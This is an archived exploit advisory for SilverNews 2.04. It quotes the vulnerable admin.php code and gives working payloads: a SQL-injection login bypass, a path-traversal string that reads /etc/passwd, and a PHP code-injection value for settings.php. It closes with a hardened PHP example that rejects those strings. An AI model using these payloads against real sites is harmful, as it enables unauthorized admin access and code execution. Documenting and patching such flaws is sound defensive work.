Vendor: SilverNews
By: x0r
CVSS: 9.3 (HIGH)
Authentication Bypass, Local File Inclusion, Remote Code Execution
CWE: 264
Product Name: SilverNews
Affected Version From: 02.04
Affected Version To: 02.04
Patch Exists: YES
Related CWE: N/A
CPE: a:silver-scripts:silvernews:2.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SilverNews 2.04 Auth Bypass/LFI/RCE

SilverNews 2.04 is vulnerable to authentication bypass, local file inclusion and remote code execution. The login code in admin.php concatenates the username and password POST fields directly into its SQL query, so an attacker can bypass authentication by supplying ' or '1=1 as the username and x0r as the password. admin.php also builds a require path from the section parameter and checks only that the resulting file exists, so an attacker can perform local file inclusion by supplying a file path in that parameter. Finally, an attacker can achieve remote code execution by supplying malicious code in the show_cat_prefix parameter of settings.php.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Exploit-DB raw data:

#########################################################################################
[0x01] Information:

Name           : SilverNews 2.04
Download       : http://www.silver-scripts.de/scripts.php?script=SilverNews&l=en
Vulnerability  : Auth Bypass\LFI\RCE
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
	// Get the user information from the database
	$getinfo = $sql->query("SELECT password, username, id FROM sn".$sql->prefix."_user WHERE username = '".$_POST['username']."' AND password = '".$_POST['password']."'");
	$info = $sql->fetch_array($getinfo);
...

	// If "act" isn't set the user will be sent to the homepage.
	if (!$_GET['act'] AND !$_POST['act'] AND !$_GET['section'])
	{
		$_GET['section'] = 'home';
	}

	require "admin/header.php";

	if (file_exists('admin/'.$_GET['section'].".php"))
	{
		require 'admin/'.$_GET['section'].'.php'; #LFI
	}
	else
	{
		$admin->error('Datei konnte nicht gefunden werden!');
	}

	require "admin/footer.php";
[/code]

#########################################################################################


#########################################################################################
[0x03] Exploit:

Exploit: username: ' or '1=1
         password: x0r

LFI: admin.php?section=../../../../../../../../../../etc/passwd%00

RCE:
So we can bypass the admin login and then go to admin/settings.php and put your
evil code ^^ ex: 'show_cat_prefix' => $_POST['show_cat_prefix'], in the show_cat_prefix we
put: x0r'; echo 'lol   --> /data.inc.php

########################################################################################

# milw0rm.com [2009-02-06]
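
Hardened counterparts of the three flaws in the admin.php and settings.php code quoted above, as an added example that is not part of the advisory or of SilverNews: a bound-parameter login lookup, an allowlist for the section include, and var_export() for values written into a PHP settings file. It assumes PDO with the SQLite driver for the demo, passwords stored with password_hash(), and hypothetical table, section and variable names.

```php
<?php
// Added example, not SilverNews code. Table name, section names, the $settings
// variable and sample data are constructed; password_hash() storage is assumed.

// 1. Login: bind the username as a parameter, verify the hash in PHP.
function find_user(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare('SELECT id, username, password FROM sn_user WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row && password_verify($password, $row['password'])) ? $row : null;
}

// 2. Section include: accept only names from a fixed allowlist.
function resolve_section(?string $section, array $allowed): ?string
{
    $section = $section ?? 'home';
    return in_array($section, $allowed, true) ? 'admin/' . $section . '.php' : null;
}

// 3. Settings file: var_export() escapes quotes in values written as PHP source.
function render_settings(array $settings): string
{
    return "<?php\n\$settings = " . var_export($settings, true) . ";\n";
}

// Constructed demo: in-memory SQLite stands in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sn_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->prepare('INSERT INTO sn_user (username, password) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Login with the advisory's strings, then with the constructed real credentials.
var_dump(find_user($db, "' or '1=1", 'x0r'));
var_dump(find_user($db, 'admin', 'correct horse'));

// Section values: the advisory's traversal string, then no value at all.
$allowed = ['home', 'news', 'settings']; // hypothetical section names
var_dump(resolve_section("../../../../etc/passwd\0", $allowed));
var_dump(resolve_section(null, $allowed));

// Settings value from the advisory, rendered as a quoted PHP string literal.
echo render_settings(['show_cat_prefix' => "x0r'; echo 'lol"]);
```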